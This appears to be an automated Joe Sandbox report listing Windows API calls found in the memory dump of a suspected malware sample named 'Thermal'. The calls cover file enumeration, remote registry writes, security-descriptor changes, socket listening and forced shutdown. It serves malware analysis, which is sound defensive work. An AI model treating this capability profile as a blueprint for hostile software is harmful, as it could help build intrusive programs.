                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: 068d9106d328e25327a8f5db30195d0f7b242abc7965a37bfe6bd9341a06293a
                                                      • Instruction ID: 5cb1f4f5a2314ca4511a26be8562e67c712cf9cd0fc84d18c0766e2c6f64c028
                                                      • Opcode Fuzzy Hash: 068d9106d328e25327a8f5db30195d0f7b242abc7965a37bfe6bd9341a06293a
                                                      • Instruction Fuzzy Hash: 3AA14BB1408315ABD714EFA4D985DAFB7ECFFA4704F400919F595C2191EB30EA08CBA2
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0018F5F9
                                                      • _wcscmp.LIBCMT ref: 0018F60E
                                                      • _wcscmp.LIBCMT ref: 0018F625
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0018F637
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0018F651
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0018F669
                                                      • FindClose.KERNEL32(00000000), ref: 0018F674
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0018F690
                                                      • _wcscmp.LIBCMT ref: 0018F6B7
                                                      • _wcscmp.LIBCMT ref: 0018F6CE
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018F6E0
                                                      • SetCurrentDirectoryW.KERNEL32(001DB578), ref: 0018F6FE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0018F708
                                                      • FindClose.KERNEL32(00000000), ref: 0018F715
                                                      • FindClose.KERNEL32(00000000), ref: 0018F727
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: 358b0e193ca1722062136fac0e8970cadcc76c563e698cf91ff12cbe8a526dab
                                                      • Instruction ID: eab244c8fb64161278798ab2b8da890e47beca43e1ff1d61c272120e85ec1de5
                                                      • Opcode Fuzzy Hash: 358b0e193ca1722062136fac0e8970cadcc76c563e698cf91ff12cbe8a526dab
                                                      • Instruction Fuzzy Hash: FF31B571641219AADF15EBB4EC49ADF77ACAF4D321F1002A9F855D21A0EB30DB85CF60
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A0FB3
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,001B0980,00000000,?,00000000,?,?), ref: 001A1021
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001A1069
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 001A10F2
                                                      • RegCloseKey.ADVAPI32(?), ref: 001A1412
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 001A141F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: 2f24d9d0bc3a5a19940dfd3d0d3586425a0fedaf4a3f542fb8ab8f2f9e1d3d4f
                                                      • Instruction ID: 7a38b93c4065338d33c5196a1820bd71662e713b42cb77dea62acf3f2c2ae35c
                                                      • Opcode Fuzzy Hash: 2f24d9d0bc3a5a19940dfd3d0d3586425a0fedaf4a3f542fb8ab8f2f9e1d3d4f
                                                      • Instruction Fuzzy Hash: 77028B75200611AFCB15EF65C841E2AB7E5FF99720F04895DF89A9B3A2CB34EC41CB91
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0018F756
                                                      • _wcscmp.LIBCMT ref: 0018F76B
                                                      • _wcscmp.LIBCMT ref: 0018F782
                                                        • Part of subcall function 00184875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00184890
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0018F7B1
                                                      • FindClose.KERNEL32(00000000), ref: 0018F7BC
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0018F7D8
                                                      • _wcscmp.LIBCMT ref: 0018F7FF
                                                      • _wcscmp.LIBCMT ref: 0018F816
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018F828
                                                      • SetCurrentDirectoryW.KERNEL32(001DB578), ref: 0018F846
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0018F850
                                                      • FindClose.KERNEL32(00000000), ref: 0018F85D
                                                      • FindClose.KERNEL32(00000000), ref: 0018F86F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: 87a37fb8aef256d7366e44b6ee0ab080b5fb911bb6c72edd2a816c476b47d495
                                                      • Instruction ID: da3a1c6453c4b2296bf03643e2628b63748be750a4b7f19ba104acb01046bf6e
                                                      • Opcode Fuzzy Hash: 87a37fb8aef256d7366e44b6ee0ab080b5fb911bb6c72edd2a816c476b47d495
                                                      • Instruction Fuzzy Hash: 1C319871540219AAEF15EBB5DC89ADF776C9F1E321F1001A9F854A21A0DB30DF468F50
                                                      APIs
                                                        • Part of subcall function 00178E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00178E3C
                                                        • Part of subcall function 00178E20: GetLastError.KERNEL32(?,00178900,?,?,?), ref: 00178E46
                                                        • Part of subcall function 00178E20: GetProcessHeap.KERNEL32(00000008,?,?,00178900,?,?,?), ref: 00178E55
                                                        • Part of subcall function 00178E20: HeapAlloc.KERNEL32(00000000,?,00178900,?,?,?), ref: 00178E5C
                                                        • Part of subcall function 00178E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00178E73
                                                        • Part of subcall function 00178EBD: GetProcessHeap.KERNEL32(00000008,00178916,00000000,00000000,?,00178916,?), ref: 00178EC9
                                                        • Part of subcall function 00178EBD: HeapAlloc.KERNEL32(00000000,?,00178916,?), ref: 00178ED0
                                                        • Part of subcall function 00178EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00178916,?), ref: 00178EE1
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00178931
                                                      • _memset.LIBCMT ref: 00178946
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00178965
                                                      • GetLengthSid.ADVAPI32(?), ref: 00178976
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 001789B3
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001789CF
                                                      • GetLengthSid.ADVAPI32(?), ref: 001789EC
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001789FB
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00178A02
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00178A23
                                                      • CopySid.ADVAPI32(00000000), ref: 00178A2A
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00178A5B
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00178A81
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00178A95
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: a1275ed0110e6579ab75e32558ad16f110b3254c301bdea71092998aecf1b4e6
                                                      • Instruction ID: 8119ad124c11e1106ff33172147d056e5dd4eded6dc444aa48034d8748c23c27
                                                      • Opcode Fuzzy Hash: a1275ed0110e6579ab75e32558ad16f110b3254c301bdea71092998aecf1b4e6
                                                      • Instruction Fuzzy Hash: 1E614975940209BFDF11DFA5DC49EAEBB79FF48304F04822AF919A7290DB319A05CB61
                                                      APIs
                                                        • Part of subcall function 001A147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A0B0C
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001A0BAB
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001A0C43
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 001A0E82
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 001A0E8F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: 3e9f8c9636001a82e52db26c68e0ba20f1b5570b7c48a09f43295c32ee0d4e51
                                                      • Instruction ID: 99c2972728b27692b69c9585336691f6f09f53a1a9c5d9552c0e97dc6d23e8aa
                                                      • Opcode Fuzzy Hash: 3e9f8c9636001a82e52db26c68e0ba20f1b5570b7c48a09f43295c32ee0d4e51
                                                      • Instruction Fuzzy Hash: 47E16B35204210AFCB15DF69C995E2BBBE8EF99714F04896DF84ADB2A1DB30ED01CB51
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00184451
                                                      • __swprintf.LIBCMT ref: 0018445E
                                                        • Part of subcall function 001438C8: __woutput_l.LIBCMT ref: 00143921
                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00184488
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00184494
                                                      • LockResource.KERNEL32(00000000), ref: 001844A1
                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 001844C1
                                                      • LoadResource.KERNEL32(?,00000000), ref: 001844D3
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 001844E2
                                                      • LockResource.KERNEL32(?), ref: 001844EE
                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0018454F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                      • String ID:
                                                      • API String ID: 1433390588-0
                                                      • Opcode ID: 4e70546615db05038225f9aaea3eb1433b4227c3674b971c3eb33d79bd3081e5
                                                      • Instruction ID: bfee5ebb6ff69776f707580d2f5140e1ef9a63ff4cd85ce98e7b4bc044b58a43
                                                      • Opcode Fuzzy Hash: 4e70546615db05038225f9aaea3eb1433b4227c3674b971c3eb33d79bd3081e5
                                                      • Instruction Fuzzy Hash: E031AF7150125BAFDB11AFA0ED98ABF7BA8EF08301F004525F916D6150DB34DA51CFA0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: b2c434063d2365dd060b3eddb6909973b6579ef824ef1bee5ff79d24e8090faa
                                                      • Instruction ID: 55d980d4894d8cca83bd108852ef67af2374b46af98d9f15c4dcd87b1ed23265
                                                      • Opcode Fuzzy Hash: b2c434063d2365dd060b3eddb6909973b6579ef824ef1bee5ff79d24e8090faa
                                                      • Instruction Fuzzy Hash: A021C7316012109FDB12AF64EC49F2E7BA8FF58721F008159F9059B6A1DB30AD51CB54
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0018FA83
                                                      • FindClose.KERNEL32(00000000), ref: 0018FB96
                                                        • Part of subcall function 001252B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001252E6
                                                      • Sleep.KERNEL32(0000000A), ref: 0018FAB3
                                                      • _wcscmp.LIBCMT ref: 0018FAC7
                                                      • _wcscmp.LIBCMT ref: 0018FAE2
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0018FB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 2185952417-438819550
                                                      • Opcode ID: 372555c9bb093c19a487fbf6bd2c8fd9c9f72383f78dc92fccce428350c136e3
                                                      • Instruction ID: 5ac0407b5ddc4887edc8de4c5c627df055d737ae135d2fb8e20620112d1533de
                                                      • Opcode Fuzzy Hash: 372555c9bb093c19a487fbf6bd2c8fd9c9f72383f78dc92fccce428350c136e3
                                                      • Instruction Fuzzy Hash: 7C417E7190021AAFCF15EF64CC59AEEBBB5FF19350F14456AE814A32A1EB309B85CF50
                                                      APIs
                                                        • Part of subcall function 00179399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001793E3
                                                        • Part of subcall function 00179399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00179410
                                                        • Part of subcall function 00179399: GetLastError.KERNEL32 ref: 0017941D
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 001857B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: 9b5a4e2678bd378ec59b8ae4fb96134d5eb09cc7b6025e6d4a0515486d31b311
                                                      • Instruction ID: 2d944d4fd01546c905541f29899d082aa9f349ab4b3c095d4dd3ea03f4a63f7d
                                                      • Opcode Fuzzy Hash: 9b5a4e2678bd378ec59b8ae4fb96134d5eb09cc7b6025e6d4a0515486d31b311
                                                      • Instruction Fuzzy Hash: 2601F731650712EAE72C73A49C8ABBB7659EB04B50F948565F917D20D2DB505E009B50
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001969C7
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 001969D6
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 001969F2
                                                      • listen.WSOCK32(00000000,00000005), ref: 00196A01
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00196A1B
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00196A2F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: 8af2348887d035beec896b4e326d680f13f4949ad12f3104ddc01ff6734fe025
                                                      • Instruction ID: e799350e57cd89ee2e9a114818606d6308200505aa5413bf6648535e843f1d79
                                                      • Opcode Fuzzy Hash: 8af2348887d035beec896b4e326d680f13f4949ad12f3104ddc01ff6734fe025
                                                      • Instruction Fuzzy Hash: E421E1306006149FCB10EF64DC89B2EB7B9EF58720F118258F856A73D1DB70AD41CBA0
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00121DD6
                                                      • GetSysColor.USER32(0000000F), ref: 00121E2A
                                                      • SetBkColor.GDI32(?,00000000), ref: 00121E3D
                                                        • Part of subcall function 0012166C: DefDlgProcW.USER32(?,00000020,?), ref: 001216B4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ColorProc$LongWindow
                                                      • String ID:
                                                      • API String ID: 3744519093-0
                                                      • Opcode ID: e377db20025908842e5624cb5a28c8ee2a6a1041b27356f47be324fc8c83aca1
                                                      • Instruction ID: 7b4b27357bc43182de7a7f62b53f22cde1e2f7cb4ab44fc6f658f2c9aa6e673d
                                                      • Opcode Fuzzy Hash: e377db20025908842e5624cb5a28c8ee2a6a1041b27356f47be324fc8c83aca1
                                                      • Instruction Fuzzy Hash: 92A1477410946CFAE62CEBE9BC8DE7F35ADDB72306F16010AF812DA5D1CB219D218275
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0018C329
                                                      • _wcscmp.LIBCMT ref: 0018C359
                                                      • _wcscmp.LIBCMT ref: 0018C36E
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0018C37F
                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0018C3AF
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 2387731787-0
                                                      • Opcode ID: 5b74188bb668f2dffa13e802164d831fe941d9f92eb76168a0474b1fac96ded7
                                                      • Instruction ID: e51cf412c519daace620a8a7826475e0ded075ee3b8c6ddf23d49a485fb6339f
                                                      • Opcode Fuzzy Hash: 5b74188bb668f2dffa13e802164d831fe941d9f92eb76168a0474b1fac96ded7
                                                      • Instruction Fuzzy Hash: 57518A356046029FC718EF68D490EAAB7E4FF59320F10465DE95A873A1DB30EE05CFA1
                                                      APIs
                                                        • Part of subcall function 00198475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001984A0
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00196E89
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00196EB2
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00196EEB
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00196EF8
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00196F0C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      • Opcode ID: 272c7baf8c5789ecf27dc9e9b82689d8aa6d7d216eaf5dc9bea918f0e988672b
                                                      • Instruction ID: 11a0e8c76b46d12526d0b6eadc81f1fce0e3deae3fc9bf652598dc0bb1f4dd9a
                                                      • Opcode Fuzzy Hash: 272c7baf8c5789ecf27dc9e9b82689d8aa6d7d216eaf5dc9bea918f0e988672b
                                                      • Instruction Fuzzy Hash: 7E41E275B00624AFDB10AF64EC86F6E77A8DF68710F048558F959AB3C2DB709D108FA1
                                                      APIs
                                                      Memory Dump Source
